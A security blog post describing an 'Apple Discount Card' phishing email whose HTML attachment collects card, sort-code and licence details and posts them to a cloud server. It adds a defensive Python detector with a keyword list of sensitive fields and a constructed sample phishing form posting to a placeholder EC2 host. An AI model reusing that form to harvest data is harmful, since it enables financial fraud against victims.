Phishing for Apples in the Cloud

Apple customers in the UK and Australia are being targeted in a convincing-looking phishing scam with a cloudy twist.
 
Criminals are sending out targeted emails promising a “Discount Card” as a “reward to long-term customers”. This non-existent card supposedly offers £100 or $100 of credit at any Apple store, for the low-low price of just £9. As you can see below, the email contains enough location- and currency-specific information to make it more credible.
 

[Image: Phishing mail out to steal your personal info]


 
Of course the card does not exist and will never be delivered. Instead of a link to a phishing site, the mail contains an HTML attachment, again convincing-looking, using Apple style sheets. The criminals ask for a slew of personal and financial information including name, address, driver's licence number, date of birth, credit card number, expiry date, security code and sort code. Quite enough for some serious financial fraud.
 

[Image: the attachment's form with its “Submit!” button]


 
Instead of this stolen information being directly uploaded to a criminal or compromised server, the big blue Submit button POSTs the data to a server in Amazon’s EC2 cloud as shown below with dummy data. Once the data has been successfully sent to the criminal server, the browser is redirected to the official Apple web site.
 

[Image: Captured traffic from the phishing attack]


 
This cleverly crafted and targeted attack may well be enough to fool the unwary, and its abuse of commercial cloud infrastructure will make it much more likely to get past URL-blocking security mechanisms.
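Because the attachment itself carries the form, a mail gateway can catch this kind of attack by inspecting the HTML rather than relying on URL blocking. The following is an added example, not code from the original post: it parses an attached HTML file and flags any form that sends sensitive fields (card number, security code, sort code, licence number and the like) to a host outside the brand's own domain. The sample attachment and the EC2 hostname in it are constructed placeholders, not the real ones.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Input names that, when posted off-brand, mark a data-harvesting form.
SENSITIVE = {"card", "cvv", "cvc", "security", "sort", "licence", "license",
             "birth", "expiry", "password"}

class FormCollector(HTMLParser):
    """Records every <form> action and the names of the fields inside it."""
    def __init__(self):
        super().__init__()
        self.forms = []        # list of (action, [field names])
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = (a.get("action") or "", [])
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            self._current[1].append((a.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def suspicious_forms(html, trusted_domains):
    """Return forms that send sensitive fields to a host outside trusted_domains
    (the brand the attachment claims to be, e.g. apple.com)."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for action, names in parser.forms:
        host = (urlparse(action).hostname or "").lower()
        on_brand = any(host == d or host.endswith("." + d) for d in trusted_domains)
        sensitive = sorted({n for n in names if any(k in n for k in SENSITIVE)})
        if sensitive and not on_brand:
            findings.append({"action": action, "host": host, "fields": sensitive})
    return findings

# Constructed sample shaped like the attachment described in the post;
# the EC2 hostname is a placeholder, not the real one.
SAMPLE = """<html><body>
<form method="post" action="http://ec2-203-0-113-10.compute-1.amazonaws.com/cgi-bin/submit.php">
<input name="fullname"><input name="address"><input name="drivers_licence">
<input name="card_number"><input name="expiry"><input name="security_code">
<input name="sort_code"><input type="submit" value="Submit"></form></body></html>"""

if __name__ == "__main__":
    for f in suspicious_forms(SAMPLE, ["apple.com"]):
        print(f"{len(f['fields'])} sensitive fields posted to {f['host']}: {f['fields']}")
```

A form that posts the same fields to a host under apple.com is not flagged, so the check keys on where the data goes, not on the brand's look and feel that the attachment copies.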
 
I have informed Amazon of this abuse of their services, but in the meantime remember, there’s no such thing as an “Apple Discount Card”.
 
Never respond to unsolicited email, never open files attached to unsolicited email and never enter personal data on anything other than an SSL-encrypted web site (one where the address starts with “https://”). If you do receive an email making you an offer you can’t refuse, do not follow links in the mail, but contact the vendor directly, either by typing in their web address or using the good old telephone.
 
